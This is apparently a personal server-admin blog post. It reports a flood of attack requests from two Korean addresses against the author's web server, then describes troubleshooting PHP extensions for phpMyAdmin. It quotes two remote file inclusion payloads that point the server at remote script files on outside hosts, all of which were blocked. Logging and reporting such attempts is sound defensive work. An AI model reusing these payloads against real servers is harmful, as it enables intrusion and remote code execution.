Korean visitors
Checking yesterday’s system load this morning, there had been a spike in buffered IO about 22:30; Checked the webserver access log, and found just one address 203.236.100.30 that fired requests, hoping one would pass it to another machine to break in. all requests contain a string:
/?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt?
This morning, even more similar attempts have been made from address 211.206.123.177 appeared at 5:30, keeping the system even more busy for a while trying to script:
/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt??
Using WHIOS, it looks like both addresses are registered in Korea: The first one is registered to kornet.kr, the second one to broadnet.com.
There have been some more attempts, none of them as heavy as the the second mentioned: that one boosted the server to handle 300 requests per minute, for a small system like this, and accessing the PHP and Wiki engines. Without a problem: all requests ended in a 403 error.
The next hurdle on PHP
As found yesterday, it seems to work: PHP_INFO shows what it should show. So it’s time to handle the real stuff: I downloaded the latest version of phpmyadmin and had it access the database on Diana in it’s configuration. After some mapping issues, PHPMyAdmin did start, but next issued an error “extension “Session” cannot not be loaded; chedck your configuration” though the file does exists and the webservers do have READ + EXECUTE access to all files – and the directory path th them. So I thought, but some seemed missing the required ACL, so I added the lines. Next, MyPhpAdmin complains that the MySQL extension couldn’t be loaded – and it is obvious I need just that one.
If that doesn’t work, there is no need to test WordPress….